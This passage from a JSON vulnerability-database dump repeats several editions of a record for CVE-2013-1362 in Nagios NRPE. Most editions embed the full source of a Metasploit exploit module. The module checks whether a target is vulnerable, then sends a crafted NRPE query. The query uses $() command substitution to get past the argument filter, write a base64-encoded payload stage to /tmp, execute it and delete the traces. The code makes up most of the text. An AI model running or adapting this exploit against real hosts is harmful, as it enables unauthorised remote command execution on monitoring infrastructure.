When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-19T11:26:05", "history": [], "viewCount": 119, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "openvas", "idList": ["OPENVAS:850457", "OPENVAS:865756", "OPENVAS:865802", "OPENVAS:1361412562310120026", "OPENVAS:1361412562310865756", "OPENVAS:1361412562310850457", "OPENVAS:1361412562310865802", "OPENVAS:1361412562310850460", "OPENVAS:850460", "OPENVAS:1361412562310121262"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "nessus", "idList": ["SUSE_11_NAGIOS-NRPE-130710.NASL", "ALA_ALAS-2013-203.NASL", "FEDORA_2013-9829.NASL", "NAGIOS_NRPE_2_14.NASL", "OPENSUSE-2013-301.NASL", "FEDORA_2013-9836.NASL", "FEDORA_2013-9848.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0621-1", "SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0624-1"]}, {"type": "saint", "idList": ["SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:E0F846270087DB671556237BDF17DDDE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121287", "PACKETSTORM:120507"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2018-08-19T11:26:05"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires 
Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's 
Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n 
vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-19T11:26:05", "differentElements": ["sourceData"], "edition": 87}, 
{"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "221de7eb2a0f009605030c49b30fe87e", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-03-14T11:02:27", "history": [], "viewCount": 119, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "nessus", "idList": ["SUSE_11_NAGIOS-NRPE-130710.NASL", "ALA_ALAS-2013-203.NASL", "NAGIOS_NRPE_2_14.NASL", "FEDORA_2013-9836.NASL", "OPENSUSE-2013-301.NASL", "FEDORA_2013-9848.NASL", "FEDORA_2013-9829.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310120026", "OPENVAS:865802", "OPENVAS:865756", "OPENVAS:850457", "OPENVAS:1361412562310865756", "OPENVAS:1361412562310850457", "OPENVAS:850460", "OPENVAS:1361412562310865802", "OPENVAS:1361412562310850460", "OPENVAS:1361412562310121262"]}, {"type": "suse", "idList": ["SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0624-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "saint", "idList": ["SAINT:E0F846270087DB671556237BDF17DDDE", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3"]}, {"type": "packetstorm", 
"idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-03-14T11:02:27"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2019-03-14T11:02:27", "differentElements": ["sourceData"], "edition": 88}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "c959c5b4ed9c6c656d3d46477b650b67", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-03-14T12:50:57", "history": [], "viewCount": 123, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "suse", "idList": ["SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0624-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "nessus", "idList": ["NAGIOS_NRPE_2_14.NASL", "FEDORA_2013-9836.NASL", "OPENSUSE-2013-301.NASL", "FEDORA_2013-9848.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "ALA_ALAS-2013-203.NASL", "FEDORA_2013-9829.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310865756", "OPENVAS:1361412562310850457", "OPENVAS:850460", "OPENVAS:1361412562310865802", "OPENVAS:1361412562310850460", "OPENVAS:1361412562310120026", "OPENVAS:865802", "OPENVAS:865756", "OPENVAS:850457", "OPENVAS:1361412562310121262"]}, {"type": "saint", "idList": ["SAINT:E0F846270087DB671556237BDF17DDDE", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-03-14T12:50:57"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires 
Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's 
Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n 
vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2019-03-14T12:50:57", "differentElements": ["modified", "published"], "edition": 
89}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "bcf0013cb10e4d36a9c4a433070f246b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-04-09T00:05:18", "history": [], "viewCount": 123, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "nessus", "idList": ["NAGIOS_NRPE_2_14.NASL", "OPENSUSE-2013-301.NASL", "FEDORA_2013-9836.NASL", "FEDORA_2013-9848.NASL", "ALA_ALAS-2013-203.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "FEDORA_2013-9829.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310850457", "OPENVAS:1361412562310865756", "OPENVAS:1361412562310120026", "OPENVAS:865802", "OPENVAS:865756", "OPENVAS:850457", "OPENVAS:850460", "OPENVAS:1361412562310850460", "OPENVAS:1361412562310865802", "OPENVAS:1361412562310121262"]}, {"type": "suse", "idList": ["SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0624-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "saint", "idList": ["SAINT:E0F846270087DB671556237BDF17DDDE", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3"]}, {"type": 
"packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-04-09T00:05:18"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2019-04-09T00:05:18", "differentElements": ["modified", "published"], "edition": 90}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "c959c5b4ed9c6c656d3d46477b650b67", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2019-04-09T02:02:52", "history": [], "viewCount": 125, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1362"]}, {"type": "saint", "idList": ["SAINT:E0F846270087DB671556237BDF17DDDE", "SAINT:191B282062BFEBFDC0EBFA60A2FDED78", "SAINT:21BB3E24EB9AE6BD8636B7F5A2A455A3"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:120507", "PACKETSTORM:121287"]}, {"type": "openvas", "idList": ["OPENVAS:850460", "OPENVAS:1361412562310850460", "OPENVAS:1361412562310865802", "OPENVAS:1361412562310850457", "OPENVAS:1361412562310865756", "OPENVAS:1361412562310120026", "OPENVAS:865802", "OPENVAS:865756", "OPENVAS:850457", "OPENVAS:1361412562310121262"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0624-1", "SUSE-SU-2013:1219-1", "OPENSUSE-SU-2013:0621-1"]}, {"type": "nessus", "idList": ["NAGIOS_NRPE_2_14.NASL", "OPENSUSE-2013-301.NASL", "FEDORA_2013-9836.NASL", "FEDORA_2013-9848.NASL", "ALA_ALAS-2013-203.NASL", "SUSE_11_NAGIOS-NRPE-130710.NASL", "FEDORA_2013-9829.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "amazon", "idList": ["ALAS-2013-203"]}, {"type": "exploitdb", "idList": ["EDB-ID:24955"]}, {"type": "zdt", "idList": ["1337DAY-ID-20645"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12910"]}], "modified": "2019-04-09T02:02:52"}}, "objectVersion": "1.4", "sourceHref": 